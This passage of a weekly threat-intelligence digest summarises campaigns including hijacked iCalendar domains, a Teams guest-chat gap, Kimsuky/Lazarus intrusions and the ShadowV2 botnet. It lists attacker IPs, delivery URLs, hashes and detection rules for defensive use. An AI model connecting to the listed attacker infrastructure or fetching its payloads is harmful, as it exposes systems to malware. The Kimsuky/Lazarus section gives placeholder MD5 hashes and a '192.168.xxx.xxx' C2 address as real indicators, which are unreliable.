Attacker Domains: cseconline.org, d32tpl7xt7175h.cloudfront.net, dorareco.net, mydownload.z29.web.core.windows.net, naturadeco.net, paquimetro.net, racineupci.org, vnptgroup.it.com
Victim Industries: Aerospace, Civic and Social Organizations, Defense, Education, Energy, Financial, Financial Services, Government, Healthcare, Mining, Non-Governmental Organizations (NGOs), Technology Hardware, Telecommunications
Victim Countries: Afghanistan, Algeria, Australia, Austria, Bangladesh, Belarus, Belgium, Bhutan, Brazil, Bulgaria, Cambodia, China, Cyprus, Czech Republic, Djibouti, Egypt, Estonia, Ethiopia, Finland, France, Germany, Greece, Hong Kong, Hungary, India, Indonesia, Ireland, Italy, Japan, Kuwait, Laos, Latvia, Malaysia, Maldives, Moldova, Mongolia, Mozambique, Myanmar, Nepal, Netherlands, Nigeria, Pakistan, Palestine, Philippines, Romania, Russia, Rwanda, Saudi Arabia, Serbia, Singapore, Slovakia, South Africa, South Korea, Sri Lanka, Sudan, Sweden, Taiwan, Thailand, Turkey, Uganda, Ukraine, United Arab Emirates, United Kingdom, United States, Vatican City, Vietnam

Mitigation Advice
Prioritize and deploy the November 2025 Microsoft Patch Tuesday security updates to all Windows endpoints and servers to apply the mitigation for CVE-2025-9491.
Conduct a threat hunt across all endpoints for indicators of compromise related to this campaign, such as anomalous PowerShell execution originating from .lnk files, evidence of the PlugX RAT, and signs of DLL sideloading.
Configure your email security gateway to block or quarantine all incoming emails containing .lnk file attachments, including those within compressed archives like .zip files.
Issue an immediate security alert to all employees, warning them not to open or click on unexpected shortcut (.lnk) files, especially those received in emails, and to report any suspicious emails to the security team.

Compliance Best Practices
Implement an application allowlisting policy, such as Windows Defender Application Control (WDAC), to restrict the execution of unauthorized applications and scripts on endpoints.
Enable PowerShell Script Block Logging and Module Logging on all Windows systems and forward these logs to a centralized SIEM for monitoring and alerting on suspicious script execution.
Deploy or tune an Endpoint Detection and Response (EDR) tool to create detection rules for suspicious process chains, such as explorer.exe spawning a .lnk file which then launches PowerShell or cmd.exe.
Establish a continuous security awareness training program that includes regular phishing simulations using lures with various attachment types, including shortcuts and archives, to train users to identify and report threats.
Enforce the principle of least privilege by removing local administrator rights from all standard user accounts to contain the impact of malware execution.

Stay updated on emerging threats: sign up for the F5 Threat Report to receive the Weekly Threat Report in your inbox.

F5 Threat Report - December 3rd, 2025
Hundreds of Abandoned iCalendar Sync Domains Put Nearly 4 Million Devices at Risk

A study has revealed that over 390 abandoned or hijacked iCalendar sync domains are still receiving daily synchronization requests from nearly 4 million iOS and macOS devices, posing significant security risks. When users subscribe to external calendars, their devices automatically fetch updates via .ics files, and attackers can register expired domains to serve malicious .ics files. These files can contain harmful event links, phishing URLs, or prompts for unwanted applications, appearing legitimate within users' calendars. Apple devices' calendar sync daemons, identified by user-agent strings like `dataaccessd/1.0`, continuously request updates. Further investigation linked these hijacked servers to JavaScript payloads that trick users into granting push notification permissions or subscribing to spam calendars, often overlapping with large-scale notification scam campaigns and infrastructure previously compromised by Balada Injector malware. While most attacks leverage social engineering, some campaigns have distributed weaponized .ics files exploiting vulnerabilities such as CVE-2025-27915 in Zimbra, allowing JavaScript execution without user interaction. Security experts warn that calendar-based threats are an overlooked attack vector, recommending that organizations review active calendar subscriptions, implement whitelist-based firewall rules, and include calendar security in employee awareness training to mitigate risks from large-scale phishing, malware delivery, and data harvesting.
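The network-side review the article recommends, as an added example that is not part of the original report: it sweeps proxy-log lines for requests carrying the `dataaccessd/1.0` user-agent and an `Accept: text/calendar` header, and groups those that reach hosts outside an allowlist of approved calendar providers by destination and requesting client, which is the starting point for a subscription review. The JSON-lines log format, its field names and the allowlist are assumptions; the sample log is constructed.

```python
"""Sweep proxy logs for Apple calendar-sync fetches that reach hosts outside an
approved list. Added example; the JSON-lines log format and the allowlist are constructed."""
import json
from collections import defaultdict

# Assumed allowlist of calendar providers the organisation approves (constructed values).
APPROVED_CALENDAR_DOMAINS = ("calendar.google.com", "outlook.office365.com",
                             "caldav.example-corp.test")

# Constructed proxy log (one JSON object per line); the field names are an assumption.
SAMPLE_LOG = """
{"ts": "2025-11-20T08:00:01Z", "src": "10.1.4.22", "host": "calendar.google.com", "path": "/calendar/ical/team/basic.ics", "user_agent": "dataaccessd/1.0", "accept": "text/calendar"}
{"ts": "2025-11-20T08:00:03Z", "src": "10.1.4.22", "host": "sync.example-parked.test", "path": "/holidays.ics", "user_agent": "dataaccessd/1.0", "accept": "text/calendar"}
{"ts": "2025-11-20T08:00:05Z", "src": "10.1.7.9", "host": "sync.example-parked.test", "path": "/holidays.ics", "user_agent": "dataaccessd/1.0", "accept": "text/calendar"}
{"ts": "2025-11-20T08:00:07Z", "src": "10.1.7.9", "host": "www.example.test", "path": "/", "user_agent": "Mozilla/5.0", "accept": "text/html"}
{"ts": "2025-11-20T08:00:09Z", "src": "10.1.9.3", "host": "feeds.example-abandoned.test", "path": "/team.ics", "user_agent": "dataaccessd/1.0", "accept": "text/calendar, */*"}
{"ts": "2025-11-20T08:00:11Z", "src": "10.1.9.3", "host": "cdn.example-other.test", "path": "/icon.png", "user_agent": "dataaccessd/1.0", "accept": "*/*"}
this line is not JSON and must not abort the sweep
"""


def is_calendar_sync(entry):
    """Apple's sync daemon identifies itself as dataaccessd/1.0 and asks for text/calendar."""
    return (entry.get("user_agent", "").startswith("dataaccessd/")
            and "text/calendar" in entry.get("accept", ""))


def host_allowed(host, allowlist):
    """Exact or subdomain match against the approved calendar providers."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in allowlist)


def find_rogue_calendar_sync(log_text, allowlist=APPROVED_CALENDAR_DOMAINS):
    """Group calendar-sync requests to non-approved hosts by destination.
    Returns {host: {"requests": n, "clients": {src, ...}, "paths": {path, ...}}}."""
    rogue = defaultdict(lambda: {"requests": 0, "clients": set(), "paths": set()})
    for raw in log_text.splitlines():
        raw = raw.strip()
        if not raw:
            continue
        try:
            entry = json.loads(raw)
        except json.JSONDecodeError:
            continue  # malformed line: skip it rather than abort the whole sweep
        if not is_calendar_sync(entry):
            continue
        host = entry.get("host", "").lower().rstrip(".")
        if not host or host_allowed(host, allowlist):
            continue
        rec = rogue[host]
        rec["requests"] += 1
        rec["clients"].add(entry.get("src", "unknown"))
        rec["paths"].add(entry.get("path", "/"))
    return dict(rogue)


def report(rogue):
    """One line per rogue host, the most widely subscribed first, for the subscription review."""
    ordered = sorted(rogue.items(), key=lambda kv: (-len(kv[1]["clients"]), kv[0]))
    return [f"{host}: {len(rec['clients'])} device(s), {rec['requests']} fetch(es), "
            f"paths {sorted(rec['paths'])}" for host, rec in ordered]


if __name__ == "__main__":
    for line in report(find_rogue_calendar_sync(SAMPLE_LOG)):
        print(line)
```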
Severity: Critical

Sources
https://cyberpress.org/icalendar-sync-domains/
https://www.hkcert.org/security-bulletin/zimbra-multiple-vulnerabilities_20251107

Threat Details and IOCs
Malware: Balada Injector
CVEs: CVE-2025-27915
Technologies: Apple iOS, Apple macOS, Zimbra Collaboration
Threat Actors: APT28, UNC1151
Attacker IPs: 193.29.58.37
Attacker Emails: spam_to_junk@proton.me
Attacker Domains: 0.allowandgo.com, 0.blueandbesthome.com, 0.mo12.biz, 1downloadss0ftware.xyz, bestresulttostart.com, ffrk.net, linetoslice.com, linetowaystrue.com, mo17.biz, mos3.biz, perfectlinestarter.com, readytocheckline.com, recordsbluemountain.com, taskscompletedlists.com, topwebsites1d.com
Attacker URLs: http://mos3.biz/?webcal=me2tanrymi5gi3bpgu4tmna&u=230c9837-23ee-4208-8df0-1fa854490c90&l=24&t=1620652575&g=3&al=ar&sub1=&sub2=&sub3=&sub4=b0690ftho9zwh124, https://mo17.biz/?p=gy3ggyrzgm5gi3bpgy2dsny, https://mo17.biz/?webcal=me2tanrymi5gi3bpgu4tmna&u=230c9837-23ee-4208-8df0-1fa854490c90&l=24&t=1620652575&g=3&al=ar&sub1=&sub2=&sub3=&sub4=b0690ftho9zwh124, hxxps://ffrk.net/apache2_config_default_51_2_1
Attacker Hashes: e05c546f30212173ba878c31bbd8b93216cab1e847676b7bae870719f37dd7a5
Victim Industries: Government, Technology Hardware
Victim Countries: Brazil, China

Mitigation Advice
Instruct all users to immediately review their calendar subscriptions on all corporate and BYOD Apple devices (iOS and macOS) and remove any unrecognized or unnecessary subscriptions.
Configure network monitoring tools to create alerts for outbound traffic from Apple devices that contains both the user-agent 'dataaccessd/1.0' and the 'Accept: text/calendar' header, destined for non-standard or uncategorized domains.
If your organization uses the Zimbra Collaboration Suite, immediately apply the vendor-supplied patches to mitigate the actively exploited cross-site scripting vulnerability, CVE-2025-27915.
Send an immediate security bulletin to all employees warning them about the risks of unsolicited calendar events and browser push notification prompts. Instruct them to decline all unexpected requests to 'Allow' notifications and to avoid clicking links in suspicious calendar entries.

Compliance Best Practices
Develop and implement a network firewall policy that whitelists approved domains for iCalendar synchronization and blocks all other outbound requests matching the 'dataaccessd/1.0' user-agent.
Update the corporate security awareness training program to include a dedicated module on the risks of calendar subscriptions, phishing via calendar events, and social engineering tactics used in browser push notification scams.
Develop and deploy a Mobile Device Management (MDM) configuration profile to restrict or disable the ability for users to add arbitrary calendar subscriptions on corporate-managed iOS and macOS devices.
Configure the email security gateway to specifically inspect incoming `.ics` file attachments for malicious links and embedded scripts, and consider implementing content disarm and reconstruction (CDR) for these files.

Microsoft Teams Guest Chat Flaw Could Let Hackers Deliver Malware

A critical vulnerability in Microsoft Teams guest chat allows attackers to bypass Defender for Office 365 protections by exploiting an architectural gap in cross-tenant collaboration. When users accept guest invitations to external Teams tenants, they fall under the hosting tenant's security policies, which attackers can disable in low-cost Microsoft 365 tenants lacking Defender for Office 365. The November 2025 rollout of feature MC1182004, enabling chats with anyone via email by default, makes this attack practical, allowing attackers to invite targets to their unprotected environments and deliver phishing or malware without detection. To mitigate this, organizations should restrict B2B guest invitations to trusted domains via Microsoft Entra ID, configure granular cross-tenant access policies, limit external Teams communication to specific domains through the Teams Admin Center, and consider disabling the MC1182004 feature using the PowerShell command `Set-CsTeamsMessagingPolicy -UseB2BInvitesToAddExternalUsers $false`. This issue highlights that security protections follow the resource tenant, a distinction organizations must address to prevent sophisticated attacks.

Severity: Critical

Sources
https://buaq.net/go-378428.html
https://gbhackers.com/microsoft-teams-guest-chat-flaw/
https://hackread.com/microsoft-teams-guest-chat-flaw-malware/

Threat Details and IOCs
Technologies: Microsoft 365, Microsoft Entra ID, Microsoft Teams
Victim Industries: Critical Manufacturing, Financial, Government

Mitigation Advice
In Microsoft Entra ID, navigate to 'External Identities' -> 'External collaboration settings' and change the 'Guest invite settings' to 'Allow invitations only to specified domains'. Populate the list with currently known and trusted partner domains.
In the Microsoft Teams Admin Center, under 'Users' -> 'External access', set the policy for Teams and Skype for Business users in external organizations to 'Allow only specific external domains' and add the domains of trusted business partners.
Use PowerShell to connect to your Microsoft Teams instance and run the command 'Set-CsTeamsMessagingPolicy -Identity Global -UseB2BInvitesToAddExternalUsers $false' to disable the ability for users to start chats with external users using just an email address.
In Microsoft Entra ID, under 'External Identities' -> 'Cross-tenant access settings', configure the default settings to block all inbound and outbound B2B collaboration and B2B direct connect access for both users and applications.
Compliance Best Practices
Develop and implement a formal policy and process for vetting, approving, and periodically reviewing external organizations for Teams collaboration. Use this process to manage the allowlists in Entra ID's cross-tenant access settings and the Teams Admin Center.
Develop and deploy a recurring security awareness training module that specifically educates users on the risks of accepting Microsoft Teams guest invitations from unknown organizations. The training should explain that security protections do not carry over and should instruct users on how to verify and report suspicious invitations.

DPRK-Linked Kimsuky and Lazarus Coordinate Espionage and Financial Theft via CVE-2024-38193

Kimsuky and Lazarus operate a coordinated campaign, combining Kimsuky's precise espionage with Lazarus's financial theft capabilities, both under DPRK control. Kimsuky initiates attacks through academic-themed spearphishing, using malicious HWP and MSC attachments to harvest credentials and reconnaissance data, deploying backdoors like FPSpy and the KLogEXE keylogger. Lazarus then leverages zero-day Windows privilege escalation, specifically CVE-2024-38193, and malicious Node.js packages to gain SYSTEM privileges and deploy the InvisibleFerret backdoor for cryptocurrency wallet theft. The groups share C2 infrastructure, intelligence, and tools, employing advanced evasion techniques such as encrypted/HTTP-like C2 traffic, multi-layer packing (Fudmodule), domain rotation, and anti-EDR capabilities to avoid detection. This collaboration has resulted in the rapid exfiltration of sensitive documents and significant cryptocurrency thefts, including a single incident of $32 million and over $120 million cumulatively since 2024.
The campaign utilizes various MITRE ATT&CK techniques, including Phishing (T1566), Input Capture (T1056), Exploitation for Privilege Escalation (T1068), Command and Scripting Interpreter (T1059), Ingress Tool Transfer (T1105), Boot or Logon Autostart Execution (T1547), Obfuscated Files or Information (T1027), Application Layer Protocol (T1071), Exfiltration Over C2 Channel (T1041), Valid Accounts (T1078), and Domain Policy Modification (T1484). Key indicators of compromise include FPSpy (MD5: a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6) and InvisibleFerret (MD5: f6e5d4c3b2a1f0e9d8c7b6a5f4e3d2c1) hashes, shared C2 IP addresses like 192.168.xxx.xxx, the academic lure domain academic-symposium[.]info, and the exploitation of CVE-2024-38193. Severity: Critical Sources https://buaq.net/go-375362.html https://buaq.net/go-376034.html https://cyberpress.org/exploiting-code-hosting-platforms/ https://cyberpress.org/north-korean-job-fraud/ https://gbhackers.com/json-storage/ https://securityonline.info/north-koreas-contagious-interview-apt-uses-json-keeper-and-gitlab-to-deliver-beavertail-spyware/ https://slowmist.medium.com/explanation-msmt-the-dprks-violation-and-evasion-of-un-sanctions-via-cyber-and-it-worker-e2a674d3a2c5?source=rss-4ceeedda40e8------2 https://thehackernews.com/2025/11/north-korean-hackers-turn-json-services.html https://www.hendryadrian.com/inside-dprks-fake-job-platform-targeting-u-s-ai-talent-validin/ https://www.hendryadrian.com/kimsuky-and-lazarus-coordinated-campaign/ https://www.hendryadrian.com/kimsuky-health-checkup-email-malware/ Threat Details and IOCs Malware: Agenda, AkdoorTea, AlphaSeed, AppleJeus, AppleSeed, ATMDtrack, BabyShark, Beavertail, BeaverTail, Dtrack, FPSpy, FudModule, InfoKey, InvisibleFerret, JamBog, Kaiten, KGH_SPY, KLogEXE, MoonPeak, OtterCookie, Play, Playcrypt, Qilin, RokRAT, TrollAgent, Troll Stealer, Tropidoor, Tsunami, TsunamiKit, XenoRAT, XORIndex CVEs: CVE-2017-0199, CVE-2018-13379, CVE-2019-0708, CVE-2020-12812, CVE-2022-42475, 
CVE-2023-27532, CVE-2023-27997, CVE-2024-21762, CVE-2024-27198, CVE-2024-38193, CVE-2024-55591 Technologies: Apple macOS, Atlassian Bitbucket, BtcTurk, Bybit, DMM Bitcoin, ESTsoft ALZIP, Exclusible, GitHub, GitLab, Google Chrome, Hancom Hangul Word Processor, JSONsilo, Keeper, LinkedIn, Linux, MetaMask, Microsoft .NET Framework, Microsoft Windows, Munchables, Node.js, npm, npoint.io, OnyxDAO, Pastebin, Phantom, Python, Radiant Capital, TronLink, WazirX Threat Actors: Agenda, AlluringPisces, Andariel, APT37, APT38, APT43, APT45, Beavertail, BlackBanshee, Bluenoroff, CitrineSleet, CL-STA-0240, CryptoCore, DeceptiveDevelopment, DEV#POPPER, EmeraldSleet, FamousChollima, GleamingPisces, GwisinGang, InvisibleFerret, JadeSleet, Kimsuky, Lazarus, LazarusGroup, MoonstoneSleet, OnyxSleet, OtterCookie, Qilin, SapphireSleet, SilentChollima, SparklingPisces, StardustChollima, Temp.Hermit, TenaciousPungsan, Thallium, TraderTraitor, UNC4899, UNC5342, VelvetChollima, VoidDokkaebi, WageMole Attacker Countries: North Korea, Russia Attacker IPs: 104.200.67.96, 107.189.25.109, 144.172.100.142, 144.172.103.97, 144.172.95.226, 144.172.97.7, 146.70.253.10, 146.70.253.107, 147.124.197.138, 147.124.197.149, 147.124.212.146, 147.124.212.89, 147.124.214.129, 147.124.214.131, 147.124.214.237, 165.140.86.227, 167.88.36.13, 172.86.84.38, 172.86.98.240, 173.211.106.101, 185.153.182.241, 185.235.241.208, 216.126.229.166, 216.189.150.185, 23.106.253.194, 23.106.253.215, 23.106.253.221, 23.106.253.242, 23.106.70.154, 23.227.202.242, 23.227.202.244, 23.254.164.156, 38.92.47.151, 38.92.47.85, 38.92.47.91, 45.128.52.14, 45.137.213.30, 45.43.11.201, 45.61.133.110, 45.61.150.30, 45.61.150.31, 45.61.151.71, 45.76.160.53, 5.253.43.122, 66.235.168.232, 66.235.175.109, 67.203.7.163, 67.203.7.171, 69.62.86.78, 72.61.9.45, 86.104.74.51, 88.218.0.78, 94.131.97.195, 95.164.17.24 Attacker Emails: ahmadbahai07@gmail.com, drgru854@gmail.com, jackhill2765@gmail.com, jack.murray.tf7@gmail.com, 
magalhaesbruno236@gmail.com, reichenausteve@gmail.com, stromdev712418@gmail.com, trungtrinh0818@gmail.com Attacker Domains: advisorflux.com, api.jsonsilo.com, api.npoint.io, app.lenvny.com, assureeval.com, bitbucket.org, bloxholder.com, carrerlilla.com, cloudflariz.com, cookiemanager.ne.kr, effertz-carroll.com, evangelia.edu, freeconference.io, ftpserver0909.com, generated.photos, github.com, gitlab.com, ipcheck.cloud, jsonkeeper.com, jsonsilo.com, kupaywallet.com, lenvny.com, load.samework.o-r.kr, mirotalk.io, mirotalk.net, n34kr3z26f3jzp4ckmwuv5ipqyatumdxhgjgsmucc65jac56khdy5zqd.onion, naverbox.pe.kr, nidiogln.ne.kr, npoint.io, pastebin.com, railway.app, regioncheck.net, thispersondoesntexist.com, unioncrypto.vip, wud.wuaze.com, www.jsonkeeper.com Attacker URLs: http://147.124.214.129:1244, http://173.211.106.101:1245, https://app.lenvny.com/cam-v-abc123.fix, hxxp://146.70.253.107:1224/client/99/81, hxxp://146.70.253.107:1224/pdown, hxxp://23.254.164.156/introduction-video, hxxp://n34kr3z26f3jzp4ckmwuv5ipqyatumdxhgjgsmucc65jac56khdy5zqd.onion, hxxps://api.jsonsilo.com/public/0048f102-336f-45dd-aef6-3641158a4c5d, hxxps://api.jsonsilo.com/public/942acd98-8c8c-47d8-8648-0456b740ef8b, hxxps://api.npoint.io/03f98fa639fa37675526, hxxps://api.npoint.io/148984729e1384cbe212, hxxps://api.npoint.io/2169940221e8b67d2312, hxxps://api.npoint.io/336c17cbc9abf234d423, hxxps://api.npoint.io/38acf86b6eb42b51b9c2, hxxps://api.npoint.io/62755a9b33836b5a6c28, hxxps://api.npoint.io/832d58932fcfb3065bc7, hxxps://api.npoint.io/8df659fd009b5af90d35, hxxps://api.npoint.io/a1dbf5a9d5d0636edf76, hxxps://api.npoint.io/cb0f9d0d03f50a5e1ebe, hxxps://api.npoint.io/e6a6bfb97a294115677d, hxxps://api.npoint.io/f4be0f7713a6fcdaac8b, hxxps://api.npoint.io/f6dd89c1dd59234873cb, hxxps://github.com/0x3ca54/arena-world, hxxps://github.com/adammajoros250-creator/123456ddd, hxxps://github.com/adammajoros250-creator/alex111, hxxps://github.com/adammajoros250-creator/Apexora-test, 
hxxps://github.com/adammajoros250-creator/bot111, hxxps://github.com/adammajoros250-creator/corex-arc-fork, hxxps://github.com/adammajoros250-creator/demotest, hxxps://github.com/carlotalentengine-sketch, hxxps://github.com/edwardtam919/staking-platform-main, hxxps://github.com/harrypotter060327-netizen/David-test, hxxps://github.com/harrypotter060327-netizen/eeeee, hxxps://github.com/harrypotter060327-netizen/Harry-Potter, hxxps://github.com/harrypotter060327-netizen/Test_Estoken, hxxps://github.com/harrypotter060327-netizen/TEST_LORD, hxxps://github.com/harrypotter060327-netizen/test_project, hxxps://github.com/InfiniGods-Tech/rei, hxxps://github.com/meta-stake/RaceStake, hxxps://github.com/meta-stake/RealEstateVC, hxxps://github.com/parth5805/iGuru-Task, hxxps://github.com/TommyMinion/DeFi-Market, hxxps://gitlab.com/goldencity-group/goldencity-demo, hxxps://gitlab.com/real-world-assest-tokenization/goldencity, hxxps://gitlab.com/technicalmanager-group/real-esate, hxxps://jsonkeeper.com/b/4NAKK, hxxps://jsonkeeper.com/b/6OCFY, hxxps://jsonkeeper.com/b/86H03, hxxps://jsonkeeper.com/b/8RLOV, hxxps://jsonkeeper.com/b/BADWN, hxxps://jsonkeeper.com/b/E4YPZ, hxxps://jsonkeeper.com/b/FM8D6, hxxps://jsonkeeper.com/b/GCGEX, hxxps://jsonkeeper.com/b/GNOX4, hxxps://jsonkeeper.com/b/IARGW, hxxps://jsonkeeper.com/b/IXHS4, hxxps://jsonkeeper.com/b/JV43N, hxxps://pastebin.com/u/AmendMinds7934, hxxps://pastebin.com/u/AmendMinds7934_LoverTumor2853, hxxps://pastebin.com/u/AmendMinds7934LoverTumor2853, hxxps://pastebin.com/u/NotingRobe2871, hxxps://pastebin.com/u/NotingRobe2871_FranzStill8494, hxxps://pastebin.com/u/NotingRobe2871FranzStill8494, hxxps://pastebin.com/u/ShadowGates1462, hxxps://pastebin.com/u/ShadowGates1462_PastPhys9067, hxxps://pastebin.com/u/ShadowGates1462PastPhys9067, hxxps://www.jsonkeeper.com/b/JNGUQ, hxxps://www.jsonkeeper.com/b/O2QKK, hxxps://www.jsonkeeper.com/b/RZATI, hxxps://www.jsonkeeper.com/b/T7Q4V, hxxps://www.jsonkeeper.com/b/VBFK7 Attacker Hashes: 
3aed5502118eb9b8c9f8a779d4b09e11, 5e2186e65f84726e8c8284d48db66805fc7e02ce43a73a7ac6bf5a5fff3a35e2, 84d25292717671610c936bca7f0626f5, 94ef379e332f3a120ab16154a7ee7a00, 9d9a25482e7e40e8e27fdb5a1d87a1c12839226c85d00c6605036bd1f4235b21, b29ddcc9affdd56a520f23a61b670134 Victim Industries: Construction, Cryptocurrency, Defense Industrial Base, Education, Financial Services, Financial Technology, Government, Healthcare, Information Technology, Insurance, Market Research, Real Estate, Software, Technology Hardware Victim Countries: Argentina, Brazil, Cambodia, Canada, China, Colombia, Costa Rica, Egypt, Equatorial Guinea, France, Germany, Guinea, India, Indonesia, Japan, Kenya, Laos, Mexico, Netherlands, Nigeria, Pakistan, Philippines, Portugal, Russia, Serbia, South Korea, Tanzania, Turkey, United Arab Emirates, United Kingdom, United States, Vietnam Mitigation Advice Immediately apply the security patch for CVE-2024-38193 to all vulnerable Windows systems. Block the domain 'academic-symposium[.]info' at the web proxy, DNS firewall, and email gateway. Add the file hashes for FPSpy (MD5: a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6) and InvisibleFerret (MD5: f6e5d4c3b2a1f0e9d8c7b6a5f4e3d2c1) to your Endpoint Detection and Response (EDR) and antivirus blocklists. Configure email security gateways to block or quarantine incoming emails with HWP and MSC file attachments. Run threat hunting queries in your SIEM and EDR to search for suspicious process behaviors, such as HWP files spawning 'winlogon.exe' or any process accessing cryptocurrency wallet paths like '%APPDATA%\MetaMask'. Compliance Best Practices Develop and implement a mandatory, recurring security awareness training program that focuses on identifying spearphishing emails and the risks of handling unsolicited attachments or links. Implement application control policies, such as AppLocker, to restrict the execution of unauthorized scripts and executables, particularly in developer environments. 
Establish a secure software development lifecycle (SDLC) policy that includes vetting all third-party libraries, such as those from npm, for known vulnerabilities or malicious code before they are approved for use.
Implement regular auditing and alerting for any modifications to Group Policy Objects (GPOs) to quickly detect unauthorized changes used for lateral movement.
Implement network segmentation to isolate critical assets, such as domain controllers and servers handling financial data, from the general user network.
Deploy a network security solution capable of TLS inspection to decrypt and analyze outbound web traffic for signs of command-and-control (C2) activity.
Establish and enforce a corporate policy that requires all company-managed cryptocurrency assets to be stored in hardware wallets and prohibits the use of software wallets on networked endpoints.

ShadowV2 Botnet Exploits AWS Outage to Infect IoT Devices in 28 Countries

A Mirai-based botnet, ShadowV2, emerged during a widespread AWS outage last October, infecting IoT devices across 28 countries and multiple sectors including technology, retail, government, and education. This activity, potentially a "test run" for future attacks, involved the botnet exploiting vulnerabilities in devices from vendors including DD-WRT (CVE-2009-2765), D-Link (CVE-2020-25506, CVE-2022-37055, CVE-2024-10914, CVE-2024-10915), DigiEver (CVE-2023-52163), TBK (CVE-2024-3721), and TP-Link (CVE-2024-53375). The infection process dropped a `binary.sh` downloader that delivered "shadow"-prefixed malware binaries from 81[.]88[.]18[.]108; the binaries use an XOR-encoded configuration to reach a command-and-control server for DDoS attacks and display the string "ShadowV2 Build v1.0.0 IoT version." While ShadowV2's observed activity was limited to the outage period, its emergence underscores the persistent vulnerability of IoT devices, a point further highlighted by a subsequent 15.72 Tbps DDoS attack on Azure by the Aisuru botnet, which was successfully mitigated.

Severity: Critical

Sources
https://cyberpress.org/shadowv2-malware/
https://dataconomy.com/2025/11/27/shadowv2-botnet-exploited-aws-outage-timeline-to-test-global-iot-attacks/
https://www.bleepingcomputer.com/news/security/new-shadowv2-botnet-malware-used-aws-outage-as-a-test-opportunity/
https://www.fortinet.com/blog/threat-research/shadowv2-casts-a-shadow-over-iot-devices
https://www.securitylab.ru/news/566583.php
https://www.securitylab.ru/news/566590.php
https://www.theregister.com/2025/11/26/miraibased_botnet_shadowv2/

Threat Details and IOCs
Malware: Airashi, Aisuru, Bash0day, Bashlite, BASHLITE, boatnet, Gafgyt, Gayfemboy, Hakai, Katana, LizardStresser, Lizkebab, Lzrd, LZRD, Miori, Mirai, Okiru, Pandora, Qbot, Satori, ShadowV2, SpeakUp, Torlus, TurboMirai, Yowai
CVEs: CVE-2009-2765, CVE-2020-25506, CVE-2022-37055, CVE-2023-52163, CVE-2024-10914, CVE-2024-10915, CVE-2024-3721, CVE-2024-53375
Technologies: Amazon Web Services, DD-WRT, Digiever, Digiever Network Video Recorders, D-Link, D-Link GO-RT-AC750, D-Link ShareCenter, Linux, TBK, TBK DVRs, TP-Link, TP-Link Archer
Threat Actors: LZRD
Attacker IPs: 198.199.72.27, 23.97.62.139, 81.88.18.108
Attacker Domains: silverpath.shadowstresser.info
Attacker Hashes: 0408d57c5ded5c79bf1c5b15dfde95547e17b81214dfc84538edcdbef4e61ffe, 22aa3c64c700f44b46f4b70ef79879d449cc42da9d1fe7bad66b3259b8b30518, 24ad77ed7fa9079c21357639b04a526ccc4767d2beddbd03074f3b2ef5db1b69, 499a9490102cc55e94f6a9c304eea86bbe968cff36b9ac4a8b7ff866b224739f, 5b5daeaa4a7e89f4a0422083968d44fdfe80e9a32f25a90bf023bca5b88d1e30, 6f1a5f394c57724a0f1ea517ae0f87f4724898154686e7bf64c6738f0c0fb7b6, 7dfbf8cea45380cf936ffdac18c15ad91996d61add606684b0c30625c471ce6a, 80ee2bf90545c0d539a45aa4817d0342ff6e79833e788094793b95f2221a3834, bb326e55eb712b6856ee7741357292789d1800d3c5a6be4f80e0cb1320f4df74, c0ac4e89e48e854b5ddbaef6b524e94cc86a76be0a7a8538bd3f8ea090d17fc2, c62f8130ef0b47172bc5ec3634b9d5d18dbb93f5b7e82265052b30d7e573eef3, cb42ae74216d81e87ae0fd51faf939b43655fe0be6740ac72414aeb4cf1fecf2, dfaf34b7879d1a6edd46d33e9b3ef07d51121026b8d883fdf8aced630eda2f83
Victim Industries: Education, Government, Hospitality, Information Technology, Managed Service Providers, Manufacturing, Retail, Technology Hardware, Telecommunications
Victim Countries: Australia, Austria, Belgium, Bolivia, Brazil, Canada, Chile, China, Croatia, Czech Republic, Egypt, France, Greece, Italy, Japan, Kazakhstan, Mexico, Morocco, Netherlands, Philippines, Russia, Saudi Arabia, South Africa, Taiwan, Thailand, Turkey, United Kingdom, United States

Mitigation Advice
Add the IP address 81.88.18.108 to the network firewall blocklist to prevent connections to and from the ShadowV2 malware delivery server.
Use your SIEM or EDR solution to search for executions of a script named 'binary.sh' and the presence of any files with the prefix 'shadow' on all endpoints.
Scan the network to identify all devices running DD-WRT firmware and immediately update any vulnerable instances to a version that patches CVE-2009-2765.
Scan the network to identify all D-Link devices vulnerable to CVE-2020-25506, CVE-2022-37055, CVE-2024-10914, or CVE-2024-10915. Apply vendor patches where available or isolate and plan for the replacement of end-of-life devices.
Scan the network to identify TBK DVRs vulnerable to CVE-2024-3721. Since no patch is available, isolate these devices from the network immediately and prioritize their replacement.
Scan the network to identify all TP-Link routers vulnerable to CVE-2024-53375 and apply the necessary firmware updates immediately.
Compliance Best Practices
Design and implement a separate network segment (VLAN) for all IoT devices to isolate them from critical business systems and user networks.
Develop and enforce an IoT security policy that defines standards for the procurement, deployment, configuration, and lifecycle management of all connected devices.
Establish a formal vulnerability management program that includes regular, automated scanning of all network assets, including IoT devices, to proactively identify and remediate vulnerabilities.
Implement a default-deny egress filtering policy on the network firewall, allowing outbound connections only for specifically approved protocols, ports, and destinations required for business operations.
Implement a Cloud Security Posture Management (CSPM) tool to continuously monitor AWS environments for misconfigurations and security risks in EC2 instances and other services.

ASUS Warns of Critical Auth Bypass Flaw (CVE-2025-59366) in AiCloud Routers

ASUS has released new firmware to address nine security vulnerabilities, including a critical authentication bypass flaw, CVE-2025-59366, affecting its routers with AiCloud enabled. This vulnerability, stemming from an unintended side effect of Samba functionality, allows remote attackers to execute specific functions without proper authorization by chaining path traversal and OS command injection weaknesses; it requires low attack complexity and no user interaction. Users are strongly advised to update their router firmware to the latest versions, specifically those in the `3.0.0.4_386`, `3.0.0.4_388`, and `3.0.0.6_102` series. For end-of-life models that will not receive updates, mitigation steps include disabling all internet-accessible services such as remote access from WAN, port forwarding, DDNS, VPN server, DMZ, port triggering, and FTP, cutting remote access to devices running vulnerable AiCloud software, and employing strong passwords for router administration and wireless networks. This follows a previous critical authentication bypass, CVE-2025-2492, patched in April, which was exploited in "Operation WrtHug" to compromise thousands of ASUS WRT routers globally.

Severity: Critical

Sources
https://buaq.net/go-378236.html
https://cyberinsider.com/asus-patches-critical-vulnerabilities-in-routers-and-pc-software/
https://meterpreter.org/asus-patches-critical-aicloud-flaw-cve-2025-59366-allowing-remote-router-takeover/
https://securityonline.info/8-flaws-asus-routers-urgently-need-patch-for-authentication-bypass-cve-2025-59366-cvss-9-4/
